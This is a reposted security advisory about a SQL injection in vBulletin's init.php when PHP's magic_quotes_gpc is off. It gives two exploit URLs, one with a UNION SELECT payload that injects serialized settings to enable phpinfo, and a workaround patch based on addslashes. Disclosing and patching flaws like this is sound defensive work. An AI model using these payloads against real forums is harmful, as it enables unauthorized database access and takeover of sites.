[转载]vBulletin init.php SQL Injection漏洞

信息来源：www.securiteam.com

Summary
vBulletin is "a commonly used web forum system written in PHP. One of its key features is use of templates, which allow the board administrator to dynamically modify the look of the board".

vBulletin's init.php contains a SQL injection if the "magic_quotes_gpc" directive of PHP has been set to OFF.

Details
Exploit:
http://site/forum/global.php?specialtemplates=al3ndaleeb')
http://site/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb') UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*

Workaround:
Open init.php file and search for these lines:
$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplates) . "')
");
unset($specials, $specialtemplates);

Replace with these :
if(!is_array($specialtemplates))
exit;

$specialtemplate = array();
foreach ($specialtemplates AS $arrykey => $arryval)
{
$specialtemplate[] = addslashes($specialtemplates["$arrykey"]);
}

$datastoretemp = $DB_site->query("
SELECT title, data
FROM " . TABLE_PREFIX . "datastore
WHERE title IN ('" . implode("', '", $specialtemplate) . "')
");
unset($specials, $specialtemplates, $specialtemplate);

Additional information
The information has been provided by al3ndaleeb.